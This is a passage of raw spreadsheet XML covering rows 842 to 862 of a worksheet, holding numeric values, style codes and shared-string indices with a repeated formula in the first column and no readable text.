      <c r="Y842" s="45"/>
      <c r="Z842" s="38" t="s">
        <v>3496</v>
      </c>
      <c r="AA842" s="39" t="s">
        <v>3497</v>
      </c>
      <c r="AB842" s="38" t="s">
        <v>3498</v>
      </c>
      <c r="AC842" s="40">
        <v>262395.0</v>
      </c>
      <c r="AD842" s="5"/>
      <c r="AE842" s="14"/>
      <c r="AF842" s="14"/>
    </row>
    <row r="843">
      <c r="A843" s="6">
        <f t="shared" si="1"/>
        <v>0.1802310974</v>
      </c>
      <c r="B843" s="29">
        <v>1.0</v>
      </c>
      <c r="C843" s="15"/>
      <c r="D843" s="14"/>
      <c r="E843" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F843" s="14"/>
      <c r="G843" s="29">
        <v>1.0</v>
      </c>
      <c r="H843" s="29">
        <v>230.0</v>
      </c>
      <c r="I843" s="15"/>
      <c r="J843" s="5" t="s">
        <v>3499</v>
      </c>
      <c r="K843" s="15"/>
      <c r="L843" s="15"/>
      <c r="M843" s="15"/>
      <c r="N843" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O843" s="29">
        <v>1.0</v>
      </c>
      <c r="P843" s="29">
        <v>0.0</v>
      </c>
      <c r="Q843" s="15"/>
      <c r="R843" s="15"/>
      <c r="S843" s="15"/>
      <c r="T843" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U843" s="5"/>
      <c r="V843" s="5"/>
      <c r="W843" s="47"/>
      <c r="X843" s="45"/>
      <c r="Y843" s="45"/>
      <c r="Z843" s="38" t="s">
        <v>3500</v>
      </c>
      <c r="AA843" s="39" t="s">
        <v>3501</v>
      </c>
      <c r="AB843" s="38" t="s">
        <v>3502</v>
      </c>
      <c r="AC843" s="40">
        <v>160546.0</v>
      </c>
      <c r="AD843" s="5"/>
      <c r="AE843" s="14"/>
      <c r="AF843" s="14"/>
    </row>
    <row r="844">
      <c r="A844" s="6">
        <f t="shared" si="1"/>
        <v>0.528447795</v>
      </c>
      <c r="B844" s="29">
        <v>1.0</v>
      </c>
      <c r="C844" s="14"/>
      <c r="D844" s="14"/>
      <c r="E844" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F844" s="14"/>
      <c r="G844" s="29">
        <v>3.0</v>
      </c>
      <c r="H844" s="29">
        <v>240.0</v>
      </c>
      <c r="I844" s="29">
        <v>215571.0</v>
      </c>
      <c r="J844" s="15"/>
      <c r="K844" s="29">
        <v>6253.0</v>
      </c>
      <c r="L844" s="15"/>
      <c r="M844" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N844" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O844" s="29">
        <v>1.0</v>
      </c>
      <c r="P844" s="29">
        <v>0.0</v>
      </c>
      <c r="Q844" s="15"/>
      <c r="R844" s="15"/>
      <c r="S844" s="15"/>
      <c r="T844" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U844" s="5"/>
      <c r="V844" s="5"/>
      <c r="W844" s="47"/>
      <c r="X844" s="45"/>
      <c r="Y844" s="45"/>
      <c r="Z844" s="38" t="s">
        <v>3503</v>
      </c>
      <c r="AA844" s="39" t="s">
        <v>3504</v>
      </c>
      <c r="AB844" s="38" t="s">
        <v>3505</v>
      </c>
      <c r="AC844" s="40">
        <v>216159.0</v>
      </c>
      <c r="AD844" s="5"/>
      <c r="AE844" s="14"/>
      <c r="AF844" s="14"/>
    </row>
    <row r="845">
      <c r="A845" s="6">
        <f t="shared" si="1"/>
        <v>0.7315734738</v>
      </c>
      <c r="B845" s="29">
        <v>1.0</v>
      </c>
      <c r="C845" s="15"/>
      <c r="D845" s="14"/>
      <c r="E845" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F845" s="14"/>
      <c r="G845" s="29">
        <v>0.0</v>
      </c>
      <c r="H845" s="29">
        <v>135.0</v>
      </c>
      <c r="I845" s="29">
        <v>182051.0</v>
      </c>
      <c r="J845" s="15"/>
      <c r="K845" s="29">
        <v>182051.0</v>
      </c>
      <c r="L845" s="15"/>
      <c r="M845" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N845" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O845" s="29">
        <v>0.0</v>
      </c>
      <c r="P845" s="29">
        <v>5.0</v>
      </c>
      <c r="Q845" s="15"/>
      <c r="R845" s="15"/>
      <c r="S845" s="15"/>
      <c r="T845" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U845" s="5"/>
      <c r="V845" s="5"/>
      <c r="W845" s="47"/>
      <c r="X845" s="45"/>
      <c r="Y845" s="45"/>
      <c r="Z845" s="38" t="s">
        <v>3506</v>
      </c>
      <c r="AA845" s="39" t="s">
        <v>3507</v>
      </c>
      <c r="AB845" s="38" t="s">
        <v>3508</v>
      </c>
      <c r="AC845" s="40">
        <v>189607.0</v>
      </c>
      <c r="AD845" s="5"/>
      <c r="AE845" s="14"/>
      <c r="AF845" s="14"/>
    </row>
    <row r="846">
      <c r="A846" s="6">
        <f t="shared" si="1"/>
        <v>0.7672357004</v>
      </c>
      <c r="B846" s="29">
        <v>1.0</v>
      </c>
      <c r="C846" s="29">
        <v>48046.0</v>
      </c>
      <c r="D846" s="14"/>
      <c r="E846" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F846" s="14"/>
      <c r="G846" s="29">
        <v>0.0</v>
      </c>
      <c r="H846" s="29">
        <v>130.0</v>
      </c>
      <c r="I846" s="29">
        <v>36641.0</v>
      </c>
      <c r="J846" s="15"/>
      <c r="K846" s="15"/>
      <c r="L846" s="15"/>
      <c r="M846" s="14"/>
      <c r="N846" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O846" s="29">
        <v>1.0</v>
      </c>
      <c r="P846" s="29">
        <v>0.0</v>
      </c>
      <c r="Q846" s="15"/>
      <c r="R846" s="15"/>
      <c r="S846" s="15"/>
      <c r="T846" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U846" s="5"/>
      <c r="V846" s="5"/>
      <c r="W846" s="47"/>
      <c r="X846" s="45"/>
      <c r="Y846" s="45"/>
      <c r="Z846" s="38" t="s">
        <v>3509</v>
      </c>
      <c r="AA846" s="39" t="s">
        <v>3510</v>
      </c>
      <c r="AB846" s="38" t="s">
        <v>3511</v>
      </c>
      <c r="AC846" s="40">
        <v>48043.0</v>
      </c>
      <c r="AD846" s="5"/>
      <c r="AE846" s="14"/>
      <c r="AF846" s="14"/>
    </row>
    <row r="847">
      <c r="A847" s="6">
        <f t="shared" si="1"/>
        <v>0.5662487015</v>
      </c>
      <c r="B847" s="29">
        <v>1.0</v>
      </c>
      <c r="C847" s="14"/>
      <c r="D847" s="14"/>
      <c r="E847" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F847" s="14"/>
      <c r="G847" s="29">
        <v>0.0</v>
      </c>
      <c r="H847" s="29">
        <v>161.0</v>
      </c>
      <c r="I847" s="29">
        <v>267666.0</v>
      </c>
      <c r="J847" s="15"/>
      <c r="K847" s="29">
        <v>42391.0</v>
      </c>
      <c r="L847" s="15"/>
      <c r="M847" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N847" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O847" s="29">
        <v>2.0</v>
      </c>
      <c r="P847" s="29">
        <v>1.0</v>
      </c>
      <c r="Q847" s="15"/>
      <c r="R847" s="15"/>
      <c r="S847" s="15"/>
      <c r="T847" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U847" s="5"/>
      <c r="V847" s="5"/>
      <c r="W847" s="47"/>
      <c r="X847" s="45"/>
      <c r="Y847" s="45"/>
      <c r="Z847" s="38" t="s">
        <v>3512</v>
      </c>
      <c r="AA847" s="39" t="s">
        <v>3513</v>
      </c>
      <c r="AB847" s="38" t="s">
        <v>2716</v>
      </c>
      <c r="AC847" s="40">
        <v>255529.0</v>
      </c>
      <c r="AD847" s="5"/>
      <c r="AE847" s="14"/>
      <c r="AF847" s="14"/>
    </row>
    <row r="848">
      <c r="A848" s="6">
        <f t="shared" si="1"/>
        <v>0.2469660961</v>
      </c>
      <c r="B848" s="29">
        <v>1.0</v>
      </c>
      <c r="C848" s="15"/>
      <c r="D848" s="14"/>
      <c r="E848" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F848" s="14"/>
      <c r="G848" s="29">
        <v>2.0</v>
      </c>
      <c r="H848" s="29">
        <v>320.0</v>
      </c>
      <c r="I848" s="29">
        <v>269827.0</v>
      </c>
      <c r="J848" s="15"/>
      <c r="K848" s="29">
        <v>6253.0</v>
      </c>
      <c r="L848" s="15"/>
      <c r="M848" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N848" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O848" s="29">
        <v>4.0</v>
      </c>
      <c r="P848" s="29">
        <v>3.0</v>
      </c>
      <c r="Q848" s="15"/>
      <c r="R848" s="15"/>
      <c r="S848" s="15"/>
      <c r="T848" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U848" s="5"/>
      <c r="V848" s="5"/>
      <c r="W848" s="47"/>
      <c r="X848" s="45"/>
      <c r="Y848" s="45"/>
      <c r="Z848" s="38" t="s">
        <v>3514</v>
      </c>
      <c r="AA848" s="39" t="s">
        <v>3515</v>
      </c>
      <c r="AB848" s="38" t="s">
        <v>3516</v>
      </c>
      <c r="AC848" s="40">
        <v>256917.0</v>
      </c>
      <c r="AD848" s="5"/>
      <c r="AE848" s="14"/>
      <c r="AF848" s="14"/>
    </row>
    <row r="849">
      <c r="A849" s="6">
        <f t="shared" si="1"/>
        <v>0.7137642338</v>
      </c>
      <c r="B849" s="29">
        <v>1.0</v>
      </c>
      <c r="C849" s="29">
        <v>12771.0</v>
      </c>
      <c r="D849" s="14"/>
      <c r="E849" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F849" s="14"/>
      <c r="G849" s="29">
        <v>3.0</v>
      </c>
      <c r="H849" s="29">
        <v>316.0</v>
      </c>
      <c r="I849" s="29">
        <v>6253.0</v>
      </c>
      <c r="J849" s="15"/>
      <c r="K849" s="15"/>
      <c r="L849" s="15"/>
      <c r="M849" s="14"/>
      <c r="N849" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O849" s="29">
        <v>2.0</v>
      </c>
      <c r="P849" s="29">
        <v>2.0</v>
      </c>
      <c r="Q849" s="15"/>
      <c r="R849" s="15"/>
      <c r="S849" s="15"/>
      <c r="T849" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U849" s="5"/>
      <c r="V849" s="5"/>
      <c r="W849" s="47"/>
      <c r="X849" s="45"/>
      <c r="Y849" s="45"/>
      <c r="Z849" s="38" t="s">
        <v>3517</v>
      </c>
      <c r="AA849" s="39" t="s">
        <v>3518</v>
      </c>
      <c r="AB849" s="38" t="s">
        <v>3519</v>
      </c>
      <c r="AC849" s="40">
        <v>12770.0</v>
      </c>
      <c r="AD849" s="5"/>
      <c r="AE849" s="14"/>
      <c r="AF849" s="14"/>
    </row>
    <row r="850">
      <c r="A850" s="6">
        <f t="shared" si="1"/>
        <v>0.2780614621</v>
      </c>
      <c r="B850" s="29">
        <v>1.0</v>
      </c>
      <c r="C850" s="15"/>
      <c r="D850" s="14"/>
      <c r="E850" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F850" s="14"/>
      <c r="G850" s="29">
        <v>1.0</v>
      </c>
      <c r="H850" s="29">
        <v>59.0</v>
      </c>
      <c r="I850" s="29">
        <v>104011.0</v>
      </c>
      <c r="J850" s="15"/>
      <c r="K850" s="15"/>
      <c r="L850" s="15"/>
      <c r="M850" s="15"/>
      <c r="N850" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O850" s="29">
        <v>0.0</v>
      </c>
      <c r="P850" s="29">
        <v>0.0</v>
      </c>
      <c r="Q850" s="15"/>
      <c r="R850" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S850" s="15"/>
      <c r="T850" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U850" s="5"/>
      <c r="V850" s="5"/>
      <c r="W850" s="47"/>
      <c r="X850" s="45"/>
      <c r="Y850" s="45"/>
      <c r="Z850" s="38" t="s">
        <v>3520</v>
      </c>
      <c r="AA850" s="39" t="s">
        <v>3521</v>
      </c>
      <c r="AB850" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC850" s="40">
        <v>187154.0</v>
      </c>
      <c r="AD850" s="5"/>
      <c r="AE850" s="14"/>
      <c r="AF850" s="14"/>
    </row>
    <row r="851">
      <c r="A851" s="6">
        <f t="shared" si="1"/>
        <v>0.6362626427</v>
      </c>
      <c r="B851" s="29">
        <v>1.0</v>
      </c>
      <c r="C851" s="29">
        <v>86001.0</v>
      </c>
      <c r="D851" s="14"/>
      <c r="E851" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F851" s="14"/>
      <c r="G851" s="29">
        <v>2.0</v>
      </c>
      <c r="H851" s="29">
        <v>505.0</v>
      </c>
      <c r="I851" s="29">
        <v>45727.0</v>
      </c>
      <c r="J851" s="15"/>
      <c r="K851" s="29">
        <v>6253.0</v>
      </c>
      <c r="L851" s="15"/>
      <c r="M851" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N851" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O851" s="29">
        <v>1.0</v>
      </c>
      <c r="P851" s="29">
        <v>5.0</v>
      </c>
      <c r="Q851" s="15"/>
      <c r="R851" s="15"/>
      <c r="S851" s="15"/>
      <c r="T851" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U851" s="5"/>
      <c r="V851" s="5"/>
      <c r="W851" s="47"/>
      <c r="X851" s="45"/>
      <c r="Y851" s="45"/>
      <c r="Z851" s="38" t="s">
        <v>3522</v>
      </c>
      <c r="AA851" s="39" t="s">
        <v>3523</v>
      </c>
      <c r="AB851" s="38" t="s">
        <v>2729</v>
      </c>
      <c r="AC851" s="40">
        <v>85999.0</v>
      </c>
      <c r="AD851" s="5"/>
      <c r="AE851" s="14"/>
      <c r="AF851" s="14"/>
    </row>
    <row r="852">
      <c r="A852" s="6">
        <f t="shared" si="1"/>
        <v>0.128645481</v>
      </c>
      <c r="B852" s="29">
        <v>1.0</v>
      </c>
      <c r="C852" s="15"/>
      <c r="D852" s="14"/>
      <c r="E852" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F852" s="14"/>
      <c r="G852" s="29">
        <v>3.0</v>
      </c>
      <c r="H852" s="29">
        <v>196.0</v>
      </c>
      <c r="I852" s="29">
        <v>185292.0</v>
      </c>
      <c r="J852" s="15"/>
      <c r="K852" s="29">
        <v>185294.0</v>
      </c>
      <c r="L852" s="15"/>
      <c r="M852" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N852" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O852" s="29">
        <v>0.0</v>
      </c>
      <c r="P852" s="29">
        <v>0.0</v>
      </c>
      <c r="Q852" s="15"/>
      <c r="R852" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S852" s="15"/>
      <c r="T852" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U852" s="5"/>
      <c r="V852" s="5"/>
      <c r="W852" s="47"/>
      <c r="X852" s="45"/>
      <c r="Y852" s="45"/>
      <c r="Z852" s="38" t="s">
        <v>3524</v>
      </c>
      <c r="AA852" s="39" t="s">
        <v>3525</v>
      </c>
      <c r="AB852" s="38" t="s">
        <v>3526</v>
      </c>
      <c r="AC852" s="40">
        <v>192466.0</v>
      </c>
      <c r="AD852" s="5"/>
      <c r="AE852" s="14"/>
      <c r="AF852" s="14"/>
    </row>
    <row r="853">
      <c r="A853" s="6">
        <f t="shared" si="1"/>
        <v>0.4052474151</v>
      </c>
      <c r="B853" s="29">
        <v>1.0</v>
      </c>
      <c r="C853" s="29">
        <v>96372.0</v>
      </c>
      <c r="D853" s="14"/>
      <c r="E853" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F853" s="14"/>
      <c r="G853" s="29">
        <v>3.0</v>
      </c>
      <c r="H853" s="29">
        <v>624.0</v>
      </c>
      <c r="I853" s="29">
        <v>56579.0</v>
      </c>
      <c r="J853" s="15"/>
      <c r="K853" s="29">
        <v>56579.0</v>
      </c>
      <c r="L853" s="15"/>
      <c r="M853" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N853" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O853" s="29">
        <v>3.0</v>
      </c>
      <c r="P853" s="29">
        <v>7.0</v>
      </c>
      <c r="Q853" s="29">
        <v>0.0</v>
      </c>
      <c r="R853" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S853" s="15"/>
      <c r="T853" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U853" s="5"/>
      <c r="V853" s="5"/>
      <c r="W853" s="47"/>
      <c r="X853" s="45"/>
      <c r="Y853" s="45"/>
      <c r="Z853" s="38" t="s">
        <v>3527</v>
      </c>
      <c r="AA853" s="39" t="s">
        <v>3528</v>
      </c>
      <c r="AB853" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC853" s="40">
        <v>96329.0</v>
      </c>
      <c r="AD853" s="5"/>
      <c r="AE853" s="14"/>
      <c r="AF853" s="14"/>
    </row>
    <row r="854">
      <c r="A854" s="6">
        <f t="shared" si="1"/>
        <v>0.6601704482</v>
      </c>
      <c r="B854" s="29">
        <v>1.0</v>
      </c>
      <c r="C854" s="29">
        <v>183437.0</v>
      </c>
      <c r="D854" s="14"/>
      <c r="E854" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F854" s="14"/>
      <c r="G854" s="29">
        <v>6.0</v>
      </c>
      <c r="H854" s="29">
        <v>1007.0</v>
      </c>
      <c r="I854" s="29">
        <v>143126.0</v>
      </c>
      <c r="J854" s="15"/>
      <c r="K854" s="29">
        <v>143126.0</v>
      </c>
      <c r="L854" s="15"/>
      <c r="M854" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N854" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O854" s="29">
        <v>3.0</v>
      </c>
      <c r="P854" s="29">
        <v>1.0</v>
      </c>
      <c r="Q854" s="15"/>
      <c r="R854" s="15"/>
      <c r="S854" s="15"/>
      <c r="T854" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U854" s="5"/>
      <c r="V854" s="5"/>
      <c r="W854" s="47"/>
      <c r="X854" s="45"/>
      <c r="Y854" s="45"/>
      <c r="Z854" s="38" t="s">
        <v>3529</v>
      </c>
      <c r="AA854" s="39" t="s">
        <v>3530</v>
      </c>
      <c r="AB854" s="38" t="s">
        <v>1451</v>
      </c>
      <c r="AC854" s="40">
        <v>183428.0</v>
      </c>
      <c r="AD854" s="5"/>
      <c r="AE854" s="14"/>
      <c r="AF854" s="14"/>
    </row>
    <row r="855">
      <c r="A855" s="6">
        <f t="shared" si="1"/>
        <v>0.1694058951</v>
      </c>
      <c r="B855" s="29">
        <v>1.0</v>
      </c>
      <c r="C855" s="14"/>
      <c r="D855" s="14"/>
      <c r="E855" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F855" s="14"/>
      <c r="G855" s="29">
        <v>4.0</v>
      </c>
      <c r="H855" s="29">
        <v>347.0</v>
      </c>
      <c r="I855" s="29">
        <v>80055.0</v>
      </c>
      <c r="J855" s="15"/>
      <c r="K855" s="15"/>
      <c r="L855" s="15"/>
      <c r="M855" s="15"/>
      <c r="N855" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O855" s="29">
        <v>0.0</v>
      </c>
      <c r="P855" s="29">
        <v>4.0</v>
      </c>
      <c r="Q855" s="15"/>
      <c r="R855" s="15"/>
      <c r="S855" s="15"/>
      <c r="T855" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U855" s="5"/>
      <c r="V855" s="5"/>
      <c r="W855" s="47"/>
      <c r="X855" s="45"/>
      <c r="Y855" s="45"/>
      <c r="Z855" s="38" t="s">
        <v>3531</v>
      </c>
      <c r="AA855" s="39" t="s">
        <v>3532</v>
      </c>
      <c r="AB855" s="38" t="s">
        <v>3533</v>
      </c>
      <c r="AC855" s="40">
        <v>92881.0</v>
      </c>
      <c r="AD855" s="5"/>
      <c r="AE855" s="14"/>
      <c r="AF855" s="14"/>
    </row>
    <row r="856">
      <c r="A856" s="6">
        <f t="shared" si="1"/>
        <v>0.8320471257</v>
      </c>
      <c r="B856" s="29">
        <v>1.0</v>
      </c>
      <c r="C856" s="15"/>
      <c r="D856" s="14"/>
      <c r="E856" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F856" s="14"/>
      <c r="G856" s="29">
        <v>1.0</v>
      </c>
      <c r="H856" s="29">
        <v>426.0</v>
      </c>
      <c r="I856" s="29">
        <v>223250.0</v>
      </c>
      <c r="J856" s="15"/>
      <c r="K856" s="15"/>
      <c r="L856" s="14"/>
      <c r="M856" s="15"/>
      <c r="N856" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O856" s="29">
        <v>1.0</v>
      </c>
      <c r="P856" s="29">
        <v>3.0</v>
      </c>
      <c r="Q856" s="15"/>
      <c r="R856" s="15"/>
      <c r="S856" s="15"/>
      <c r="T856" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U856" s="5"/>
      <c r="V856" s="5"/>
      <c r="W856" s="47"/>
      <c r="X856" s="45"/>
      <c r="Y856" s="45"/>
      <c r="Z856" s="38" t="s">
        <v>3534</v>
      </c>
      <c r="AA856" s="39" t="s">
        <v>3535</v>
      </c>
      <c r="AB856" s="38" t="s">
        <v>3536</v>
      </c>
      <c r="AC856" s="40">
        <v>222661.0</v>
      </c>
      <c r="AD856" s="5"/>
      <c r="AE856" s="14"/>
      <c r="AF856" s="14"/>
    </row>
    <row r="857">
      <c r="A857" s="6">
        <f t="shared" si="1"/>
        <v>0.3590528077</v>
      </c>
      <c r="B857" s="29">
        <v>1.0</v>
      </c>
      <c r="C857" s="29">
        <v>158355.0</v>
      </c>
      <c r="D857" s="14"/>
      <c r="E857" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F857" s="14"/>
      <c r="G857" s="29">
        <v>-1.0</v>
      </c>
      <c r="H857" s="29">
        <v>244.0</v>
      </c>
      <c r="I857" s="29">
        <v>143377.0</v>
      </c>
      <c r="J857" s="15"/>
      <c r="K857" s="15"/>
      <c r="L857" s="15"/>
      <c r="M857" s="15"/>
      <c r="N857" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O857" s="29">
        <v>1.0</v>
      </c>
      <c r="P857" s="29">
        <v>2.0</v>
      </c>
      <c r="Q857" s="15"/>
      <c r="R857" s="15"/>
      <c r="S857" s="15"/>
      <c r="T857" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U857" s="5"/>
      <c r="V857" s="5"/>
      <c r="W857" s="47"/>
      <c r="X857" s="45"/>
      <c r="Y857" s="45"/>
      <c r="Z857" s="38" t="s">
        <v>3537</v>
      </c>
      <c r="AA857" s="39" t="s">
        <v>3538</v>
      </c>
      <c r="AB857" s="38" t="s">
        <v>3539</v>
      </c>
      <c r="AC857" s="40">
        <v>158354.0</v>
      </c>
      <c r="AD857" s="5"/>
      <c r="AE857" s="14"/>
      <c r="AF857" s="14"/>
    </row>
    <row r="858">
      <c r="A858" s="6">
        <f t="shared" si="1"/>
        <v>0.892865068</v>
      </c>
      <c r="B858" s="29">
        <v>1.0</v>
      </c>
      <c r="C858" s="15"/>
      <c r="D858" s="14"/>
      <c r="E858" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F858" s="14"/>
      <c r="G858" s="29">
        <v>3.0</v>
      </c>
      <c r="H858" s="29">
        <v>46985.0</v>
      </c>
      <c r="I858" s="29">
        <v>157887.0</v>
      </c>
      <c r="J858" s="15"/>
      <c r="K858" s="15"/>
      <c r="L858" s="15"/>
      <c r="M858" s="15"/>
      <c r="N858" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O858" s="29">
        <v>2.0</v>
      </c>
      <c r="P858" s="29">
        <v>4.0</v>
      </c>
      <c r="Q858" s="15"/>
      <c r="R858" s="15"/>
      <c r="S858" s="15"/>
      <c r="T858" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U858" s="5"/>
      <c r="V858" s="5"/>
      <c r="W858" s="47"/>
      <c r="X858" s="45"/>
      <c r="Y858" s="45"/>
      <c r="Z858" s="38" t="s">
        <v>3540</v>
      </c>
      <c r="AA858" s="39" t="s">
        <v>3541</v>
      </c>
      <c r="AB858" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC858" s="40">
        <v>168427.0</v>
      </c>
      <c r="AD858" s="5"/>
      <c r="AE858" s="14"/>
      <c r="AF858" s="14"/>
    </row>
    <row r="859">
      <c r="A859" s="6">
        <f t="shared" si="1"/>
        <v>0.9969145113</v>
      </c>
      <c r="B859" s="29">
        <v>1.0</v>
      </c>
      <c r="C859" s="29">
        <v>95378.0</v>
      </c>
      <c r="D859" s="14"/>
      <c r="E859" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F859" s="14"/>
      <c r="G859" s="29">
        <v>0.0</v>
      </c>
      <c r="H859" s="29">
        <v>677.0</v>
      </c>
      <c r="I859" s="29">
        <v>71164.0</v>
      </c>
      <c r="J859" s="15"/>
      <c r="K859" s="15"/>
      <c r="L859" s="5" t="s">
        <v>1241</v>
      </c>
      <c r="M859" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N859" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O859" s="29">
        <v>2.0</v>
      </c>
      <c r="P859" s="29">
        <v>0.0</v>
      </c>
      <c r="Q859" s="15"/>
      <c r="R859" s="15"/>
      <c r="S859" s="15"/>
      <c r="T859" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U859" s="5"/>
      <c r="V859" s="5"/>
      <c r="W859" s="47"/>
      <c r="X859" s="45"/>
      <c r="Y859" s="45"/>
      <c r="Z859" s="38" t="s">
        <v>3542</v>
      </c>
      <c r="AA859" s="39" t="s">
        <v>3543</v>
      </c>
      <c r="AB859" s="38" t="s">
        <v>3544</v>
      </c>
      <c r="AC859" s="40">
        <v>95369.0</v>
      </c>
      <c r="AD859" s="5"/>
      <c r="AE859" s="14"/>
      <c r="AF859" s="14"/>
    </row>
    <row r="860">
      <c r="A860" s="6">
        <f t="shared" si="1"/>
        <v>0.06386142202</v>
      </c>
      <c r="B860" s="29">
        <v>1.0</v>
      </c>
      <c r="C860" s="29">
        <v>62252.0</v>
      </c>
      <c r="D860" s="14"/>
      <c r="E860" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F860" s="14"/>
      <c r="G860" s="29">
        <v>2.0</v>
      </c>
      <c r="H860" s="29">
        <v>245.0</v>
      </c>
      <c r="I860" s="29">
        <v>35158.0</v>
      </c>
      <c r="J860" s="15"/>
      <c r="K860" s="15"/>
      <c r="L860" s="15"/>
      <c r="M860" s="15"/>
      <c r="N860" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O860" s="29">
        <v>1.0</v>
      </c>
      <c r="P860" s="29">
        <v>0.0</v>
      </c>
      <c r="Q860" s="15"/>
      <c r="R860" s="15"/>
      <c r="S860" s="15"/>
      <c r="T860" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U860" s="5"/>
      <c r="V860" s="5"/>
      <c r="W860" s="47"/>
      <c r="X860" s="45"/>
      <c r="Y860" s="45"/>
      <c r="Z860" s="38" t="s">
        <v>3545</v>
      </c>
      <c r="AA860" s="39" t="s">
        <v>3546</v>
      </c>
      <c r="AB860" s="38" t="s">
        <v>3547</v>
      </c>
      <c r="AC860" s="40">
        <v>62243.0</v>
      </c>
      <c r="AD860" s="5"/>
      <c r="AE860" s="14"/>
      <c r="AF860" s="14"/>
    </row>
    <row r="861">
      <c r="A861" s="6">
        <f t="shared" si="1"/>
        <v>0.6953668248</v>
      </c>
      <c r="B861" s="29">
        <v>1.0</v>
      </c>
      <c r="C861" s="29">
        <v>36827.0</v>
      </c>
      <c r="D861" s="14"/>
      <c r="E861" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F861" s="14"/>
      <c r="G861" s="29">
        <v>12.0</v>
      </c>
      <c r="H861" s="29">
        <v>2546.0</v>
      </c>
      <c r="I861" s="29">
        <v>2221.0</v>
      </c>
      <c r="J861" s="15"/>
      <c r="K861" s="29">
        <v>20074.0</v>
      </c>
      <c r="L861" s="15"/>
      <c r="M861" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N861" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O861" s="29">
        <v>4.0</v>
      </c>
      <c r="P861" s="29">
        <v>3.0</v>
      </c>
      <c r="Q861" s="15"/>
      <c r="R861" s="15"/>
      <c r="S861" s="15"/>
      <c r="T861" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U861" s="5"/>
      <c r="V861" s="5"/>
      <c r="W861" s="47"/>
      <c r="X861" s="45"/>
      <c r="Y861" s="45"/>
      <c r="Z861" s="38" t="s">
        <v>3548</v>
      </c>
      <c r="AA861" s="39" t="s">
        <v>3549</v>
      </c>
      <c r="AB861" s="38" t="s">
        <v>3550</v>
      </c>
      <c r="AC861" s="40">
        <v>36826.0</v>
      </c>
      <c r="AD861" s="5"/>
      <c r="AE861" s="14"/>
      <c r="AF861" s="14"/>
    </row>
    <row r="862">
      <c r="A862" s="6">
        <f t="shared" si="1"/>
        <v>0.2149725421</v>
      </c>
      <c r="B862" s="29">
        <v>1.0</v>
      </c>
      <c r="C862" s="29">
        <v>98327.0</v>
      </c>
      <c r="D862" s="14"/>
      <c r="E862" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F862" s="14"/>
      <c r="G862" s="29">
        <v>2.0</v>
      </c>
      <c r="H862" s="29">
        <v>1672.0</v>
      </c>
      <c r="I862" s="29">
        <v>84757.0</v>
      </c>
      <c r="J862" s="15"/>
      <c r="K862" s="29">
        <v>84757.0</v>
      </c>
      <c r="L862" s="15"/>
      <c r="M862" s="36" t="s">
        <v>30</v>
      </c>
